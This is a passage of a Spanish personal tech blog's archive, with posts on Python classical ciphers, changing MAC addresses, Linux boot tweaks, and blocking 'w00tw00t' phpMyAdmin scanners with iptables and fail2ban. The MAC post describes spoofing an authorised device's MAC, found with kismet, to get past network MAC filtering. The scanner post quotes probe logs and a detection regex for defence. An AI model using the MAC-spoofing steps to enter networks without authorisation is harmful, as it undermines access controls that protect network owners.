que utiliza un conjunto mayor que el de las letras, ya que utiliza el conjunto de los caracteres ASCII del \u0026ldquo;!\u0026rdquo; (33) al \u0026ldquo;~\u0026rdquo; (126), y realiza la sustitución por el carácter que está 47 puestos hacia adelante. Crearemos la lista de caracteres ASCII necesarios a partir de las listas de caracteres del módulo string. Para conseguirlo, buscaremos los índices de los caracteres de puntuación entre los cuales insertaremos las listas de dígitos y letras mayúsculas y minúsculas.\nEste es el código ASCII:\n30 40 50 60 70 80 90 100 110 120 --------------------------------- 0: ( 2 \u0026lt; F P Z d n x 1: ) 3 = G Q [ e o y 2: * 4 \u0026gt; H R \\ f p z 3: ! + 5 ? I S ] g q { 4: \u0026#34; , 6 @ J T ^ h r | 5: # - 7 A K U _ i s } 6: $ . 8 B L V ` j t ~ 7: % / 9 C M W a k u DEL 8: \u0026amp; 0 : D N X b l v 9: ;’ 1 ; E O Y c m w Y este es el contenido de la lista de signos de puntuación:\n\u0026gt;\u0026gt;\u0026gt; string.punctuation \u0026#39;!\u0026#34;#$%\u0026amp;\\\u0026#39;()*+,-./:;\u0026lt; =\u0026gt;?@[\\\\]^_`{|}~\u0026#39; Debemos colocar los números entre \u0026ldquo;/\u0026rdquo; y \u0026ldquo;:\u0026rdquo;, las letras mayúsculas entre \u0026ldquo;@\u0026rdquo; y \u0026ldquo;[\u0026rdquo;, y las letras minúsculas entre \u0026ldquo;`\u0026rdquo; y \u0026ldquo;{\u0026rdquo;:\nfrom string import punctuation as p, digits as d, ascii_lowercase as al, ascii_uppercase as au ix = p.find(\u0026#34;:\u0026#34;) iu = p.find(\u0026#34;[\u0026#34;) il = p.find(\u0026#34;{\u0026#34;) ascii = p[:ix] + d + p[ix:iu] + au + p[iu:il] + al + p[il:] \u0026gt;\u0026gt;\u0026gt; print ascii \u0026#39;!\u0026#34;#$%\u0026amp;\\\u0026#39;()*+,-./0123456789:;\u0026lt; =\u0026gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\u0026#39; \u0026gt;\u0026gt;\u0026gt; len(ascii) 94 Ya podemos crear una función rot47:\nfrom string import maketrans, translate def rot47(text, offset=47): # ascii contiene los caracteres ASCII del \u0026#34;!\u0026#34; (33) al \u0026#34;~\u0026#34; (126) return translate(text, maketrans(ascii, ascii[offset:] + ascii[:offset])) \u0026gt;\u0026gt;\u0026gt; print rot47(\u0026#34;Cómo se puede distinguir a un extrovertido de un\u0026#34;) ró\u0026gt;@ D6 AF656 5:DE:?8F:C 2 F? 6IEC@G6CE:5@ 56 F? Vigenëre Vigenëre es un cifrado César por grupos, donde cada letra del grupo sufre una traslación diferente. La longitud de la palabra clave determina el tamaño de los grupos, y cada letra especifica la traslación para cada letra del grupo. No distingue entre mayúsculas y minúsculas.\nfrom string import ascii_lowercase as al def vigenere_crypt(text, key, decrypt=0): prefix = -1 if decrypt else 1 len_t = len(text) len_k = len(key) ak = [ al.find(c) for c in key ] return \u0026#34;\u0026#34;.join([caesar(text[i], prefix*ak[i%len_k]) for i in range(len_t)]) \u0026gt;\u0026gt;\u0026gt; vigenere_crypt(\u0026#34;parisvautbienunemesse\u0026#34;, \u0026#34;loup\u0026#34;) \u0026#39;aolxdjujepctyihtxsmhp\u0026#39; \u0026gt;\u0026gt;\u0026gt; vigenere_crypt(\u0026#34;aolxdjujepctyihtxsmhp\u0026#34;, \u0026#34;loup\u0026#34;, -1) \u0026#39;parisvautbienunemesse\u0026#39; Este cifrado también quedó obsoleto después de que se descubriera el método Kasiski, que consiste en buscar palabras repetidas en el texto cifrado. Es casi seguro que dichas palabras no sólo eran la misma antes del cifrado sino que además la clave coincidió en la misma posición en ambas ocurrencias. La distancia entre palabras repetidas es múltiplo de la longitud de la clave, por lo que si tenemos diferentes palabras que se repiten, obtenemos el máximo común divisor de las longitudes y la longitud de la clave debe ser, o dicho mcd, o un factor primo de éste. Una vez encontrada la longitud de la clave, se aplica la misma técnica estadística que para el cifrado César.\n","permalink":"http://karpoke.ignaciocano.com/2011/02/16/descifrando-al-cesar-en-python/","summary":"\u003cp\u003eSi lo que pretendemos es, dada una cadena, sustituir una serie de\ncaracteres por otra, en Python es tan sencillo como pasarle al método\n\u003ccode\u003emaketrans\u003c/code\u003e una cadena con los caracteres que queremos cambiar y otra\ncon los caracteres a utilizar en su lugar. Ambas cadenas deberán tener\nla misma longitud. Este método devuelve una tabla de traducción, un\nobjeto susceptible de ser usado por el método \u003ccode\u003etranslate\u003c/code\u003e el cual se\naplica sobre un \u003cem\u003estring\u003c/em\u003e, como veremos.\u003c/p\u003e","title":"Descifrando al César en Python"},{"content":"A veces, nos puede interesar cambiar la MAC de nuestra tarjeta de red, ya sea porqué nos conectamos a una red en la que no queremos que quede registrada nuestra MAC real (todavía se podría ser más paranoico), ya sea porqué hay un filtrado por MAC y la nuestra no se encuentra en la lista de las MAC autorizadas para conectarse.\nFuente: wikipedia\nPara conocer la MAC de nuestras interfaces de red:\n$ ifconfig | grep -E \u0026#34;([0-9a-f]{2}:){5}[0-9a-f]{2}\u0026#34; eth0 Link encap:Ethernet direcciónHW 00:3c:72:26:3a:22 eth2 Link encap:Ethernet direcciónHW 00:50:cb:d9:07:79 Para cambiar la MAC de la interfaz eth0, por ejemplo:\n$ sudo ifconfig eth0 down $ sudo ifconfig eth0 hw ether 00:00:de:ad:de:ad $ sudo ifconfig eth0 up En principio, podemos asignar la dirección MAC que queramos, mientras sean números hexadecimales, con la salvedad de que, posiblemente, necesitaremos que tenga un identificador válido. Aún así, podríamos asignar una MAC aleatoria:\n$ echo $(cat /proc/interrupts | md5sum | sed -r \u0026#39;s/^(.{10}).*$/00\\1/; s/([0-9a-f]{2})/\\1:/g; s/:$//;\u0026#39;) 00:19:a9:58:2b:14 Actualizado el 22 de julio de 2014 Utilizando el comando ip, el cual vino a sustituir a ifconfig, también podemos consultar las interfaces de red:\n$ ip addr show $ ip link show Y cambiar la dirección MAC de la que nos interese:\n$ sudo ip link set dev wlan1 down $ sudo ip link set dev wlan1 address 00:19:a9:58:2b:14 $ sudo ip link set dev wlan1 up gnu mac changer macchanger es un programa que nos permite cambiar la MAC de varias maneras. Por ejemplo:\nPoner la MAC que queramos, de la misma manera que el comando anterior:\n$ sudo macchanger -m 00:50:cb:d9:07:79 eth2 Cambiar la MAC sin cambiar la información del vendedor, es decir, los tres primeros bytes:\n$ sudo macchanger -e eth2 Current MAC: 00:50:cb:b4:98:16 (Jetter) De manera aleatoria:\n$ sudo macchanger -r Mostrar un listado de vendedores:\n$ macchanger -l Filtrado de MAC Si lo que queremos es usar una MAC autorizada para poder conectarnos, dependerá de si la conexión es por cable o no. Si es por cable y tenemos acceso a una consola, simplemente obtenemos la MAC como hemos visto y enchufamos el cable de red. Si fuese un ordenador con Windows, podemos obtener la MAC a través de las propiedades de la interfaz de red en el administrador de redes del panel de control, o ejecutando en una consola:\nC:\u0026gt; ipconfig /all Si es una conexión inalámbrica, podemos obtener alguna MAC válida de algún equipo que esté conectado a la red, utilizando algún programa como kismet.\n","permalink":"http://karpoke.ignaciocano.com/2011/02/09/cambiar-la-direccion-mac/","summary":"\u003cp\u003eA veces, nos puede interesar cambiar la MAC de nuestra tarjeta de red,\nya sea porqué nos conectamos a una red en la que no queremos que quede\nregistrada nuestra MAC real (todavía se podría ser más paranoico), ya\nsea porqué hay un filtrado por MAC y la nuestra no se encuentra en la\nlista de las MAC autorizadas para conectarse.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"MAC Address\" loading=\"lazy\" src=\"/images/mac_address-300x252.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://en.wikipedia.org/wiki/MAC_address\"\u003ewikipedia\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003ePara conocer la MAC de nuestras interfaces de red:\u003c/p\u003e","title":"Cambiar la dirección MAC"},{"content":"Para saber si el procesador es de 64 bits, ejecutamos el siguiente comando:\n$ grep flags /proc/cpuinfo | grep -Eo \u0026#34; lm \u0026#34; \u0026amp;\u0026amp; echo \u0026#34;64\u0026#34; || echo \u0026#34;32\u0026#34; 32 Otro comando que nos dirá si la arquitectura es de 32 ó 64 bits es lshw:\n$ sudo lshw -C CPU | grep width width: 32 bits Para saber si el sistema operativo es de 32 ó 64 bits ejecutamos el siguiente comando:\n$ getconf LONG_BIT 32 $ uname -m i686 $ arch # es lo mismo que la anterior i6868 Otro comando útil es dpkg-architecture:\n$ dpkg-architecture DEB_BUILD_ARCH=i386 DEB_BUILD_ARCH_BITS=32 DEB_BUILD_ARCH_CPU=i386 DEB_BUILD_ARCH_ENDIAN=little DEB_BUILD_ARCH_OS=linux DEB_BUILD_GNU_CPU=i686 DEB_BUILD_GNU_SYSTEM=linux-gnu DEB_BUILD_GNU_TYPE=i686-linux-gnu DEB_BUILD_MULTIARCH=i386-linux-gnu DEB_HOST_ARCH=i386 DEB_HOST_ARCH_BITS=32 DEB_HOST_ARCH_CPU=i386 DEB_HOST_ARCH_ENDIAN=little DEB_HOST_ARCH_OS=linux DEB_HOST_GNU_CPU=i686 DEB_HOST_GNU_SYSTEM=linux-gnu DEB_HOST_GNU_TYPE=i686-linux-gnu DEB_HOST_MULTIARCH=i386-linux-gnu ","permalink":"http://karpoke.ignaciocano.com/2011/01/18/32-o-64-bits/","summary":"\u003cp\u003ePara saber si el procesador es de 64 bits, ejecutamos el siguiente\ncomando:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$ grep flags /proc/cpuinfo | grep -Eo \u003cspan style=\"color:#e6db74\"\u003e\u0026#34; lm \u0026#34;\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e echo \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;64\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e||\u003c/span\u003e echo \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;32\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e32\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOtro comando que nos dirá si la arquitectura es de 32 ó 64 bits es \u003ccode\u003elshw\u003c/code\u003e:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$ sudo lshw -C CPU | grep width\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewidth: \u003cspan style=\"color:#ae81ff\"\u003e32\u003c/span\u003e bits\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003ePara saber si el sistema operativo es de 32 ó 64 bits ejecutamos el\nsiguiente comando:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$ getconf LONG_BIT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e32\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$ uname -m\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ei686\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$ arch  \u003cspan style=\"color:#75715e\"\u003e# es lo mismo que la anterior\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ei6868\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOtro comando útil es \u003ccode\u003edpkg-architecture\u003c/code\u003e:\u003c/p\u003e","title":"32 ó 64 bits"},{"content":"Ejecutamos swipl, uno de los compiladores de Prolog libres:\n$ swipl Y si le interrogamos por el valor de una variable de la cual no puede inferir ningún valor\u0026hellip;\n% library(swi_hooks) compiled into pce_swi_hooks 0.00 sec, 2,060 bytes Welcome to SWI-Prolog (Multi-threaded, 32 bits, Version 5.8.2) Copyright (c) 1990-2009 University of Amsterdam. SWI-Prolog comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. Please visit http://www.swi-prolog.org for details. For help, use ?- help(Topic). or ?- apropos(Word). ?- K. % ... 1,000,000 ............ 10,000,000 years later % % \u0026gt;\u0026gt; 42 \u0026lt;\u0026lt; (last release gives the question) ","permalink":"http://karpoke.ignaciocano.com/2011/01/18/swi-prolog-conoce-el-sentido-de-la-vida-del-universo-y-de-todo-lo-demas/","summary":"\u003cp\u003eEjecutamos \u003ccode\u003eswipl\u003c/code\u003e, uno de los compiladores de Prolog libres:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ swipl\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Marvin\" loading=\"lazy\" src=\"/images/marvin-186x300.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eY si le interrogamos por el valor de una variable de la cual no puede\ninferir ningún valor\u0026hellip;\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e% library(swi_hooks) compiled into pce_swi_hooks 0.00 sec, 2,060 bytes\nWelcome to SWI-Prolog (Multi-threaded, 32 bits, Version 5.8.2)\nCopyright (c) 1990-2009 University of Amsterdam.\nSWI-Prolog comes with ABSOLUTELY NO WARRANTY. This is free software,\nand you are welcome to redistribute it under certain conditions.\nPlease visit http://www.swi-prolog.org for details.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eFor help, use ?- help(Topic). or ?- apropos(Word).\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e?- K.\n% ... 1,000,000 ............ 10,000,000 years later\n%\n%       \u0026gt;\u0026gt; 42 \u0026lt;\u0026lt; (last release gives the question)\n\u003c/code\u003e\u003c/pre\u003e","title":"SWI-Prolog conoce el sentido de la vida, del universo y de todo lo demas"},{"content":"Tras arreglar un par de problemas que tenía con el arranque, ya que estamos, vamos a darle un toque distinto al asunto.\nTemas de Plymouth Instalamos algunos de los temas para Plymouth:\n$ sudo apt-get install plymouth-theme-{fade-in,glow,sabily,script,solar,spinfinity,text,ubuntu-logo,text} Cambiamos por el que queramos:\n$ sudo update-alternatives --config default.plymouth Y actualizamos el initramfs:\n$ sudo update-initramfs -u Cuando reiciniemos habremos cambiado el tema de Playmouth.\nSplashscreen de Grub2 Editamos el archivo /etc/grub.d/05_debian_theme, y modificamos la línea:\nWALLPAPER=\u0026#34;/usr/share/images/desktop-base/moreblue-orbit-grub.png\u0026#34; para que apunte a la ruta de la imagen que queramos.\nNo hace falta que sea una del directorio /usr/share/images/grub, podemos crearla nosotros, pero debe respetar la resolución que tiene la pantalla del menú de Grub2, y que está espeficada en el archivo /etc/default/grub.\nActualizamos grub2\n$ sudo update-grub2 » imagen de BlackMooon\n","permalink":"http://karpoke.ignaciocano.com/2011/01/18/personalizando-el-arranque-grafico-en-ubuntu-maverirk-meerkat/","summary":"\u003cp\u003eTras arreglar un par de \u003ca href=\"/2011/01/18/solucion-de-problemas-con-plymouth-y-ati-en-ubuntu-maverick-meerkat/\"\u003eproblemas que tenía con el arranque\u003c/a\u003e, ya que\nestamos, vamos a darle un toque distinto al asunto.\u003c/p\u003e\n\u003ch2 id=\"temas-de-plymouth\"\u003eTemas de Plymouth\u003c/h2\u003e\n\u003cp\u003eInstalamos algunos de los \u003ca href=\"http://sliceoflinux.com/2010/05/14/cambia-el-tema-plymouth-de-tu-ubuntu-10-04/\"\u003etemas para Plymouth\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo apt-get install plymouth-theme-{fade-in,glow,sabily,script,solar,spinfinity,text,ubuntu-logo,text}\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCambiamos por el que queramos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo update-alternatives --config default.plymouth\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eY actualizamos el \u003ccode\u003einitramfs\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo update-initramfs -u\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCuando reiciniemos habremos cambiado el tema de Playmouth.\u003c/p\u003e\n\u003ch2 id=\"splashscreen-de-grub2\"\u003eSplashscreen de Grub2\u003c/h2\u003e\n\u003cp\u003eEditamos el archivo \u003ccode\u003e/etc/grub.d/05_debian_theme\u003c/code\u003e, y modificamos la\nlínea:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eWALLPAPER=\u0026#34;/usr/share/images/desktop-base/moreblue-orbit-grub.png\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003epara que apunte a la ruta de la imagen que queramos.\u003c/p\u003e","title":"Personalizando el arranque gráfico en Ubuntu Maverirk Meerkat"},{"content":"Se conoce que tras actualizar a Maverick Meerkat, incluso de Karmic a Lucid, algo pasaba con Playmouth, de tal manera que utilizaba una resolución inadecuada.\nLa solución parece depender en algunos casos de la tarjeta gráfica que tengamos, así que describiré la que me funcionó con una ATI Radeon:\n$ lspci | grep vga 01:00.0 VGA compatible controller: ATI Technologies Inc M92 [Mobility Radeon HD 4500 Series] Instalamos el paquete v86d:\n$ sudo aptitude install v86d Comprobamos las resoluciones que podemos poner:\n$ sudo hwinfo --framebuffer 02: None 00.0: 11001 VESA Framebuffer [Created at bios.464] Unique ID: rdCR.QOJHFkjgnM2 Hardware Class: framebuffer Model: \u0026#34;(C) 1988-2005, ATI Technologies Inc. M92\u0026#34; Vendor: \u0026#34;(C) 1988-2005, ATI Technologies Inc. \u0026#34; Device: \u0026#34;M92\u0026#34; SubVendor: \u0026#34;ATI ATOMBIOS\u0026#34; SubDevice: Revision: \u0026#34;01.00\u0026#34; Memory Size: 16 MB Memory Range: 0xd0000000-0xd0ffffff (rw) Mode 0x0300: 640x400 (+640), 8 bits Mode 0x0301: 640x480 (+640), 8 bits Mode 0x0303: 800x600 (+832), 8 bits Mode 0x0305: 1024x768 (+1024), 8 bits Mode 0x0307: 1280x1024 (+1280), 8 bits Mode 0x0310: 640x480 (+1280), 15 bits Mode 0x0311: 640x480 (+1280), 16 bits Mode 0x0313: 800x600 (+1600), 15 bits Mode 0x0314: 800x600 (+1600), 16 bits Mode 0x0316: 1024x768 (+2048), 15 bits Mode 0x0317: 1024x768 (+2048), 16 bits Mode 0x0319: 1280x1024 (+2560), 15 bits Mode 0x031a: 1280x1024 (+2560), 16 bits Mode 0x030d: 320x200 (+640), 15 bits Mode 0x030e: 320x200 (+640), 16 bits Mode 0x0320: 320x200 (+1280), 24 bits Mode 0x0393: 320x240 (+320), 8 bits Mode 0x0395: 320x240 (+640), 16 bits Mode 0x0396: 320x240 (+1280), 24 bits Mode 0x03b3: 512x384 (+512), 8 bits Mode 0x03b5: 512x384 (+1024), 16 bits Mode 0x03b6: 512x384 (+2048), 24 bits Mode 0x03c3: 640x350 (+640), 8 bits Mode 0x03c5: 640x350 (+1280), 16 bits Mode 0x03c6: 640x350 (+2560), 24 bits Mode 0x0333: 720x400 (+768), 8 bits Mode 0x0335: 720x400 (+1472), 16 bits Mode 0x0336: 720x400 (+2944), 24 bits Mode 0x0353: 1152x864 (+1152), 8 bits Mode 0x0355: 1152x864 (+2304), 16 bits Mode 0x0356: 1152x864 (+4608), 24 bits Mode 0x0363: 1280x960 (+1280), 8 bits Mode 0x0365: 1280x960 (+2560), 16 bits Mode 0x0366: 1280x960 (+5120), 24 bits Mode 0x0321: 640x480 (+2560), 24 bits Mode 0x0322: 800x600 (+3200), 24 bits Mode 0x0323: 1024x768 (+4096), 24 bits Mode 0x0324: 1280x1024 (+5120), 24 bits Mode 0x0343: 1400x1050 (+1408), 8 bits Mode 0x0345: 1400x1050 (+2816), 16 bits Mode 0x0346: 1400x1050 (+5632), 24 bits Config Status: cfg=new, avail=yes, need=no, active=unknown Escogemos, por ejemplo, 1280x960.\nEditamos el fichero /etc/default/grub y modificamos la linea:\nGRUB_CMDLINE_LINUX_DEFAULT por\nGRUB_CMDLINE_LINUX_DEFAULT=\u0026#34;quiet splash nomodeset video=uvesafb:mode_option=1280x960-24,mtrr=3,scroll=ywrap\u0026#34; Y añadimos, debajo de la línea comentada que comienza por GRUB_GFXMODE:\nGRUB_GFXMODE=1280x960 Ahora añadimos al fichero /etc/initramfs-tools/modules:\nuvesafb mode_option=1280x960-24 mtrr=3 scroll=ywrap Forzamos a usar el framebuffer en el arranque:\n$ echo FRAMEBUFFER=y | sudo tee /etc/initramfs-tools/conf.d/splash Actualizamos grub2 y initramfs:\n$ sudo update-grub2 $ sudo update-initramfs -u Y cuando reiniciemos ya estará solucionado.\nvga=769 deprecated Sin embargo, tenía otro problema con el arranque y es que me aparecía el siguiente mensaje de error:\nError \u0026#34;vga=769 is deprecated. Para solucionarlo, editamos nuevamente el archivo /etc/default/grub y modificamos la línea:\nGRUB_CMDLINE_LINUX=\u0026#34; vga=769\u0026#34; por\nGRUB_CMDLINE_LINUX=\u0026#34; gfxpayload=true gfxpayload=1280x960x24\u0026#34; Cuando reiniciemos ya estará solucionado.\n","permalink":"http://karpoke.ignaciocano.com/2011/01/18/solucion-de-problemas-con-plymouth-y-ati-en-ubuntu-maverick-meerkat/","summary":"\u003cp\u003eSe conoce que tras \u003ca href=\"/2011/01/07/actualizando-ubuntu-a-la-ultima-distribucion-de-forma-remota/\"\u003eactualizar a Maverick Meerkat\u003c/a\u003e, incluso de Karmic\na Lucid, algo pasaba con Playmouth, de tal manera que utilizaba una\nresolución inadecuada.\u003c/p\u003e\n\u003cp\u003eLa solución parece depender en algunos casos de la tarjeta gráfica que\ntengamos, así que describiré la que me \u003ca href=\"http://www.nosinmiubuntu.com/2010/10/solucion-para-el-plymouth-en-ubuntu.html\"\u003efuncionó con una ATI Radeon\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ lspci | grep vga\n01:00.0 VGA compatible controller: ATI Technologies Inc M92 [Mobility Radeon HD 4500 Series]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eInstalamos el paquete \u003ccode\u003ev86d\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install v86d\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eComprobamos las resoluciones que podemos poner:\u003c/p\u003e","title":"Solución de problemas con Plymouth y ATI en Ubuntu Maverick Meerkat"},{"content":"Si revisamos los logs del servidor web, de vez en cuando aparecen toda una serie de peticiones del tipo:\n193.108.81.203 - - [12/Jan/2011:16:48:31 +0100] \u0026#34;GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1\u0026#34; 404 488 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:34 +0100] \u0026#34;GET /db/scripts/setup.php HTTP/1.1\u0026#34; 404 471 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:35 +0100] \u0026#34;GET /mysql/scripts/setup.php HTTP/1.1\u0026#34; 404 473 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:35 +0100] \u0026#34;GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 480 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:38 +0100] \u0026#34;GET /phpmyadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 477 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:38 +0100] \u0026#34;GET /pma/scripts/setup.php HTTP/1.1\u0026#34; 404 472 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1\u0026#34; 404 479 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 480 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /web/scripts/setup.php HTTP/1.1\u0026#34; 404 472 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:39 +0100] \u0026#34;GET /websql/scripts/setup.php HTTP/1.1\u0026#34; 404 474 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:40 +0100] \u0026#34;GET /webadmin/scripts/setup.php HTTP/1.1\u0026#34; 404 476 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:40 +0100] \u0026#34;GET /sqlweb/scripts/setup.php HTTP/1.1\u0026#34; 404 474 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; 193.108.81.203 - - [12/Jan/2011:16:48:40 +0100] \u0026#34;GET /websql/scripts/setup.php HTTP/1.1\u0026#34; 404 474 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; En este caso, la IP parece ser del Reino Unido, pero va variando, así como la petición característica que hace al principio y el user agent del final, \u0026ldquo;Zemu\u0026rdquo;. En otras ocasiones, la petición es /w00tw00t.at.ISC.SANS.DFind:).\nEs algo que ya lleva un tiempo por el mundo, ya que se pueden encontrar referencias en Google de cómo mínimo un par de años. Podemos filtrar y bloquear esta clase de escaneos de varias maneras.\niptables Con iptables, a través de un script que bloquea la IP automáticamente, aunque se deben crear una reglas previamente y programar su ejecución periódica en el cron.\nCon iptables, para bloquear una IP concreta, ejecutamos:\n$ sudo iptables -I INPUT -s 193.108.81.203 -j DROP Ahora vamos a crear las reglas que necesita el script:\n$ sudo iptables -N drop_w00t $ sudo iptables -A INPUT -j drop_w00t $ sudo iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT Guardaremos las reglas y las haremos permanentes ejecutando:\n$ sudo iptables-save También podemos incluir una IP en la cadena que acabamos de crear:\n$ sudo iptables -A drop_w00t -s 211.94.188.52 -j DROP Podemos ver las IP bloqueadas en este momento (el argumento -n nos muestra las IPs, si no lo ponemos nos saldrá el dominio al que resuelve la IP, si es que lo hay):\n$ sudo iptables -L drop_w00t -n Chain drop_w00t (1 references) target prot opt source destination DROP all -- 193.108.81.203 0.0.0.0/0 DROP all -- 62.215.201.252 0.0.0.0/0 DROP all -- 80.232.176.202 0.0.0.0/0 DROP all -- 92.243.22.73 0.0.0.0/0 DROP all -- 211.94.188.52 0.0.0.0/0 DROP all -- 116.255.163.100 0.0.0.0/0 Si queremos borrar una regla, primero averiguamos qué número tiene:\n$ sudo iptables -L INPUT -n --line-numbersbash Y después borramos la regla usando ese número:\n$ sudo iptables -D INPUT [número]bash Podemos borrar una IP bloqueada dentro de una regla:\n$ sudo iptables -D drop_w00t [número]bash fail2ban También se puede filtrar con fail2ban, añadiendo una nueva opción.\nA partir de la versión 0.8.1 ya están definidas las acciones necesarias a llevar a cabo con iptables. Si tenemos una versión anterior, podemos seguir los pasos previos definidos en el enlace anterior.\nLo primero es crear un filtro, /etc/fail2ban/filter.d/apache-w00tw00t.conf:\n# 193.108.81.203 - - [12/Jan/2011:16:48:31 +0100] \u0026#34;GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1\u0026#34; 404 488 \u0026#34;-\u0026#34; \u0026#34;ZmEu\u0026#34; [Definition] # Option: failregex # Notes.: regex to match the w00tw00t scan messages in the logfile. The # host must be matched by a group named \u0026#34;host\u0026#34;. The tag \u0026#34;\u0026#34; can # be used for standard IP/hostname matching. # Values: TEXT failregex = ^ -._\u0026#34;GET \\/w00tw00t\\.at.*\u0026#34;._ # Option: ignoreregex # Notes.: regex to ignore. If this regex matches, the line is ignored. # Values: TEXT ignoreregex = Declaramos el filtro en /etc/fail2ban/jail.conf para que si 